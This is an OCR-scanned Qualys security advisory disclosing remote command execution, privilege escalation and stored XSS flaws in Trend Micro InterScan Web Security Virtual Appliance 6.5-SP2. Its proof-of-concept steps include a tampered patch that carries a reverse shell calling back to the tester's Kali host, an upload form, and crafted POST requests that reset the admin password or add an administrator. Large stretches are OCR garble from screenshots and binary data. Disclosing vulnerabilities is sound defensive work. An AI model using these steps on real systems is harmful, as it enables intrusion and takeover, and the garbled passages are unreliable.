Qualys Security Advisory QSA-2016-10-26 


October 26, 2016 


liance (IWSVA) 6.5.x 


Multiple Vulnerabilities in Trend Micro Interscan Web Security Virtual A 


SYNOPSIS: 


TrendMicro Interscan Web Security Virtual Appliance (IWSV A) suffers from Remote Command Execution 
(RCE), Privilege Escalation and Stored Cross Site Scripting vulnerabilities. 


Reference: http://downloadcenter.trendmicro.com/?prodid-86&regs-NABU 


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target Hostname: TrendMicroIWS V A6.5SP2 
2. Target IP Address: 192.168.253.150 
3. Kali Machine IP: 192.168.253.136 


Vulnerable/Tested Version: 


Interscan Web Security Virtual Appliance version 6.5-SP2 Build Linux 1707.Older versions are also 
affected. 


€ © 192.168.253.150:1812/indexjsp?CSRFGuardToken-41CNR7CS6W2EW 801 TMTIWSHOSY4 e & a via $ ñ 9 e - @ = 
INT ~| = @ SQL- XSS- Encryption: Encoding: Other- 
x LoadURL 
Q SplitURL 
, Execute 
Enable Post data Enable Referrer 

f®) TREND. | InterScan* Web Security Virtual Appliance Weleome,admin i Loa Off | [== elc u 

System Status a 

2 

mmm System Updates e 
*-Appliostion Control Select a Patch to Install 
* Bandwidth Control 

Location: | Browse.. | No file selected. Upload 

* HTTP 
+ FTP Current IWSVA Information 
+ Logs Host Name OS Version Application Version Last Updated 

Reports TrendMicroIWSVA6.5SP2 3.5.1321.el6.x86 64 (6.5-SP2 Build Linux 1707 - 10/25/16 10:06:16 PM 
* Updates 

Notifications 
— Audit Log. 


„Deployment Wizarde?  _ _ 
+ IWSVA Configuration 
+ Network Configuration 


History 


+ Management Console 
Wa Contig Barkan R Astore 
System Updates 


Application Patches ^.| OS Patches 


Patch Member 
Patchi B1707 | Uninstall 


Installed on v 
10/25/16 10:06:16 PM 


Patch Information 


IWSVA 6.5SP2 EN Patch 1 Build 1707 


hfb1622 IWSVA 6.5-SP2 Hot Fix Build 1622 10/25/16 9:59:53 PM 

cpbi620 IWSVA 6.5-SP2 Critical Patch Build 1620 10/25/16 9:55:19 PM 
v 

Spb1608 IWSVA 6.5-SP2 Critical Patch Build 1608 10/25/16 9:44:12 PM 


< > 


Note: All the vulnerabilities mentioned in this report were tested with a least privileged user account ‘test’. This 
user has ‘Reports Only’ role assigned. 
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Vulnerability 1: Remote Command Execution (RCE) 


An authenticated remote user with least privilege/role (a user with ‘Reports only’ role) can gain a ‘root’ 


shell on the system. 


Risk Factor: High 


Impact: 


An attacker with low privileges can abuse the Patch Installation functionality to execute commands on the 


system remotely and gain a ‘root’ shell. 


CVSS Score: AV:N/AC:L/AU:S/C:C/I:C/A:C 


Proof-Of-Concept: 


1. Log into IWSVA web console with least privilege user ‘test’. 


2. Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session. 
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Request Headers: 


^ 


Host: 192.168.253.150:1812 


Accept-Language: en-US,en;q-0.5 
Accept-Encoding: gzip, deflate 


Connection: keep-alive 
Upgrade-Insecure-Requests: 1 


User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 
Accept: text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 


3. Download a product patch from TrendMicro download center: 
http://downloadcenter.trendmicro.com/?prodid=86&regs=NABU 


4. I downloaded ‘iwsva-65-sp2-ar64-en-cpb1620.tgz’ and renamed it to ‘iwsva-65-sp2-ar64-en-cpb1624.tgz’ 
just to indicate a higher patch. 


5. Open this file in Archive Manager and locate ‘stargate_patch_apply.sh’ shell script. 


6. Edit this script and remove all the code and add a bash one liner reverse shell. 
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Here, 192.168.253.136 is Kali machine’s IP address which is listening on port#443 for reverse shell. 


7. Now edit the ‘stargate_patch.ini’ file to update build versions from 1620 to 1624. This may not be 
necessary but I preferred to update the file anyway. 
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#! ini_util.sh 


8. This changes the MDS hash of ‘stargate_patch.tgz’ file and it seems that there is a server side validation 
wherein server computes the file hash and checks if it matches with the one that is there in ‘“MD5SUM.txt’ 
file. This ‘MD5SUM.txt’ file is in the same ‘iwsva-65-sp2-ar64-en-cpb1624.tgz’ patch update file. 


9. Calculate the MDS hash of ‘starget_patch.tgz’ file as it's been modified and put it in *MD5SUM.txt' file. 
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10. Create a ‘patch_upload.html’ which is a file upload form and put it in document root on Kali machine. 
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html> 


«form action-"http://192.168.253.150:1812/servlet/com.trend.iwss.gui.servlet.ManagePatches?action-upload" method="post" enctype="multipart/form-data"> 
Select patch to upload: 
<input type-"file" name-"fileToUpload" id="fileToUpload"> 
<input type="submit" value="Upload Patch" name="submit"> 

</form> 


</body> 
</html> 


11. Open a new browser tab and access this page. Select the ‘iwsva-65-sp2-ar64-en-cpb1624.tgz’ to upload. 
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User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 
Accept: text/html, application/xhtml+xml, application/xm1;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
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Upgrade-Insecure-Requests: 1 

Content-Type: multipart/form-data; boundary= 
Content-Length: 4678950 


--71772542910375 


a 71772542910375 


Content-Disposition: form-data; name-"fileToUpload"; filename-"iSVa ES Sp2 area en criticalpatch Pie ihg" 


Content-Type: application/x-compressed 


sp2_aré4_en_criticalpatch_b1é24. tar{)i~ gPO10CUTDBOOE « ( 

inóuga (OPOED i Z (° ” "0000 tO OOGinniiv)» »»»ü)yfzUUDUnyiisBÓ**1V 

[ID óoC y vuuDDDCénàt i 8fló«ó» t ° ° | gëëÚJ¿ kpá GéuóC; €QuDDDODéD| Hy 706 Ome» «32- ; 40060] Ç] €) 80] GGow 

loszéné¢ yox ue] C=AD®| i** aeCycOtyDuy.p 0;9*-ónykhkülpw--óyeéy?D UsC;»SUD-D)Ue* "DOR i Ne koe | 'D"V«TÓ*-mI! EXDRüe m c TÓKYEC 

30cx EO: ésa ÉİO O2De25+AN0 OR ieDI1¢ D'BODÉSDlAuD»SXU*E E?ncupEn 

*AD0* 1«1Éiieméi- etSetrD3_ UuCOXYmAF ADOPOO -VOrmpaC Jİ gBoOENSdaeAS iDCOVO™( 1,OENOOC«\ * * Zt«ÀE 
p ;8 402%) zo 


éJ05'" D TE,j Ó( 


PC dashboard_qu L 


T 71772542910375 


€ 192.168.253.150:18 7 a ° w 84CDE6B0889829FFGE300E77180ADC81 * *ià $ # 9 w|- @- E 
INT ~| e e SQL- XSS- Encryption: Encoding- Other- 
@ Load URL - 
À pium. P 
U Execute 
C Enable Post data [] Enable Referrer 
f) TREND. | InterScan" Web Security Virtual Appliance atomesest Laso E 
2 Reports e 
e aye Ststue [8 add [P] copy f Delete | 
Dashboard l 
D] Report Name Period Generate Report Saved Reports Next Report On | 
Password r 
D] V reshepot Last 1 Day(s) Run Now | 
+ Logs 
E Burp Suite Free Edition v1.6.32 - n x | 
Burp Intruder Repeater Window Help 
Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts | 
== = 1 
[a | | 
L e J Target: http://192.168.253.150:1812 |4| 
Request Response 
Raw | Params | Headers | Hex | Raw 
serviet/com.trend, ivss.gul.serviet.ManagePatches?action=upload HTTP/1.1 n 
168.253. 150:1812 
: Mozilla/5.0 (Windows NT 10.0; WOWE4; rv:49.0) Gecko/20100101 
o 
L4 A Inspector ® Debugger html, application/xhtml+xml, application/xml; 8 a B 8 x 
ü [a] HTML CSS JS XHR Fonts iml © 23 requests, 382.83 KB, 48.35 s al 
Status Method ‘Accept-Encoding: gzip, detlate 7s 
— sere Content-Type: application/x-wiw-form-urlencoded; charset-UTF-8 
GET index jsp?CSRFGuardToken-- Ql ^  |X-Requested-With: XMLHttpRequest 
° POST dashboard queyy Referer: http://192,168.253,150:1812/log/page/dashboard.htm! 
-71772542910375 Content-Length: 107 
° POST dashboard. quen E (Coe nisiut. tcosmemcH ERE MDEH 
E onnection: keep-al v 


Note: The Session ID cookie was automatically sent as the ‘test’ user was already logged in another browser 
tab. Also, this POST request to apply/update the patch usually has 'CSRFGuardToken' in the POST body 


but removing it does NOT prevent you from uploading the patch. 


12. Got root shell on Kali machine. 
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Vulnerability 2: Privilege Escalation via ‘UpdateAccountAdministration’ functionali 


An authenticated remote user with least privilege/role (a user with ‘Reports only’ role) can change Master 
Admin's password. 


Risk Factor: 


Impact: 


An attacker with low privileges can change Master Admin’s password by sending a specially crafted POST 
request. An attacker can then have full control over the system. 


CVSS Score: AV:N/AC:L/AU:S/C:C/I:C/A:C 
Proof-Of-Concept: 
1. Log into IWSVA web console with least privilege user ‘test’. 


2. Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session. 


3. Send following POST request using BurpSuite Repeater with ‘CSRFGuardToken’ and ‘JSSESSIONID’ 
values obtained earlier. Follow redirections in BurpSuite to complete the request. 


allaccount=test&accountname= 
admin&commonname=admin&accounttype=0&password_changed=true&PASS l=cbal23&PASS2= 
cbal23&description=Master+Administrator&role_select=O0&roleid=0 


4. Master Admin’s password updated successfully. 
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POST | [http.//192.168.253.150:1812/uilogonsubmitjsp. 


Request Headers: 
Host: 192.168.253.150:1812 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 
Accept: text/html application/xhtml+xml,application/xml.q=0.9,"/*:q=0.8 
Accept-Language: en-US en;q=0.5 
Accept-Encoding: gzip, deflate 


Connection: keep-alive 
Upgrade-Insecure-Requests: 1 


Request Body: 


Content-Type: application/x-www-form-urlencoded 
Content-Length: 60 


wherefrom=€&wronglogon=no8tuid=test&passwd=noahpassSipwd=Log+On 


5. Log into IWSVA web console as ‘admin’ and new password ‘cba123’ to confirm if it works. 


Vulnerability 3: Privilege Escalation via ‘UpdateAccountAdministration’ functionality 


An authenticated remote user with least privilege/role (a user with ‘Reports only’ role) can add a privileged 


user with Administrator role. 


Risk Factor: HIGH 


Impact: 


An attacker with low privileges can gain administrative privileges by sending a specially crafted POST request. 


An attacker can then have full control over the system. 


CVSS Score: AV:N/AC:L/AU:S/C:C/I:C/A:C 


Proof-Of-Concept: 


1. Log into IWSVA web console with least privilege user ‘test’. 
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2. Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session. 
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Referer: ht 253.150:1812/ logon.jsp 
Cookie: 
Connection: 


Upgrade-Insecure-Requests: 1 
Pragma: no-cache 
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3. Send following POST request using BurpSuite Repeater with ‘CSRFGuardToken’ and ‘JSSESSIONID’ 
values obtained earlier. Follow redirections in BurpSuite to complete the request. 


| admin&accountT ype=local&accountnamelocal=hacker4&accounttype=O0&password_changed=true& 
| PASS l=pass1234&PASS2=pass 1234&description=hackerUser&role_select=1&roleid=1 


5. It shows user ‘hacker’ added successfully. 


6. Now log into IWSVA web console as admin from another browser and check to see if user ‘hacker’ has been 
added successfully. 
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Vulnerability 4- Stored Cross-Site Scripting (XSS) in ‘UpdateAccountAdministration’ functionali 


An authenticated remote attacker can inject a Java script while creating a new user that results in a cross-site 
scripting attack. 


Risk Factor: Medium 


Impact: 


An attacker with low privileges can inject malicious Java script by sending a specially crafted POST request to 
add a new user (which he shouldn’t be able to as per Vulnerability#1 mentioned above). 


Vulnerable Parameters:- 


a. Accountnamelocal 
b. Description 


Note: Other parameters may be vulnerable. 

CVSS Score: AV:N/AC:L/AU:S/C:C/I:C/A:C 
Proof-Of-Concept: 

1. Log into IWSVA web console with least privilege user ‘test’. 


2. Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session. 


3. Send following POST request using BurpSuite Repeater with * CSRFGuardToken' and ‘JSSESSIONID’ 
values obtained earlier. Follow redirections in BurpSuite to complete the request. 


4. It shows user ‘hacker4’ added successfully. 


5. Now log into IWSVA web console as admin from another browser and check to see if user ‘hacker4’ has been 
added successfully and Java script executes. 
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